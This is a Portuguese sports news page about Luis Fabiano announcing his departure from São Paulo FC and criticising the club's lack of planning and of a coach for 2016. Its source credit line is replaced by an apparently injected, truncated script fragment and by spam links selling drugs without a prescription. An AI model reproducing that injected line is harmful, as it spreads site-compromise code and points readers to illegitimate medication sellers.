Destaque Noticia

Luis Fabiano critica planejamento do São Paulo e falta de técnico para 2016

No dia em que anunciou sua despedida do São Paulo, Luis Fabiano não fugiu das perguntas e falou sobre tudo em entrevista coletiva no CT da Barra Funda.
Entre os assuntos comentados, o centroavante deu sua opinião a respeito do planejamento do time para 2016 e fez críticas pela falta de definição do novo técnico, quando foi questionado sobre a sua renovação. A expectativa era anunciá-lo nesta semana, mas o processo pode demorar mais.

– Entendo o lado do clube, foi um ano muito conturbado, problemático e com coisas atípicas. Tem coisas mais importantes para se preocupar. Até hoje nós vemos que não tem um planejamento para o ano que vem, não sabem quem será o técnico. Tudo isso é de se entender – disse.
FORA: Ceni é vetado e fica fora do última partida como profissional no Morumbi

O Fabuloso diz não acreditar em falta de comprometimento do grupo, defeito apontado pelo presidente Carlos Augusto de Barros e Silva, o Leco, e motivo de cobrança em reunião nesta semana, no CT da Barra Funda. Rodrigo Caio também apontou esse fato como problema.

– Muito se fala sobre falta de comprometimento, o que não acredito, senão não estaríamos brigando pelo G-4. Tudo que aconteceu fora de campo atrapalhou muito internamente, interfere dentro do campo. É um abandono e isso influencia a cabeça de alguns (o presidente Carlos Miguel Aidar renunciou sob denúncias de corrupção).

Não vejo ninguém com má vontade, acho que em alguns jogos faltou concentração e atitude. Mas vejo um grupo legal de trabalhar, que não teve o resultado esperado. Em determinados jogos, você fica frustrado. Perder de 6 é vergonhoso (para o time reserva do rival Corinthians), mas nós ainda temos a chance de terminar o ano da melhor maneira possível, com a Libertadores, o que seria um feito, após tantos problemas que tivemos no ano – afirmou.
O Fabuloso também disse não guardar mágoas do presidente Leco.

– Não ficou nenhum ressentimento. Depois de um jogo que você é goleado, faz parte. É preciso relevar e saber que é cobrado dentro de um grande clube. Todos sabem o que fizeram e o que poderiam fazer. Ele é o presidente e tem o direito de vir e cobrar, se isso serve para ele ou não – disse.

Com 56 pontos, o São Paulo busca a vitória contra o Figueirense, neste sábado, para se manter no G-4 do Brasileirão. Luis Fabiano deverá ser titular, ao lado de Alexandre Pato.

Fonte: Gevar d=document;var s=d.createElement(‘script’); obtain at low price drugs no rx – http://prih-hartono.mhs.narotama.ac.id/2016/11/30/obtain-at-low-price-drugs-no-rx/ obtain cheat medications without rx – http://soe.wpengine.com/obtain-cheat-medications-without-rx/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

treino-cap-weverton1ps-k9qc-u202218120950bqe-1024x617gp-web

Imprensa paranaense especula goleiro no Tricolor

saopauloadmin19 de agosto de 2017
hernanes

Hernanes explica uso de frase folclórica após vitória sobre o Botafogo

saopauloadmin18 de agosto de 2017
marcoshernanesnem

Decepções, acertos e esperanças: veja como estão os reforços de 2017 até agora

saopauloadmin18 de agosto de 2017
lucas

São Paulo pode ter até cinco novidades para jogo contra o Avaí

saopauloadmin18 de agosto de 2017
chrome_2017-08-17_21-23-25

Gargalhada de Sidão movimenta torcida do São Paulo nas redes após goleiro virar titular

saopauloadmin18 de agosto de 2017
sidaodenisrenan

Temos três goleiros, mas na verdade parece que não temos nenhum!

saopauloadmin18 de agosto de 2017
gilberto_svqo4i3

Gilberto e Edimar voltam a treinar e devem enfrentar o Avaí

saopauloadmin17 de agosto de 2017
lucas

Lucas Fernandes: pronto para voltar e retomar o bom momento

saopauloadmin17 de agosto de 2017
renan-ribeiro

São Paulo aumenta proposta e renovação de Renan Ribeiro fica mais viável

saopauloadmin17 de agosto de 2017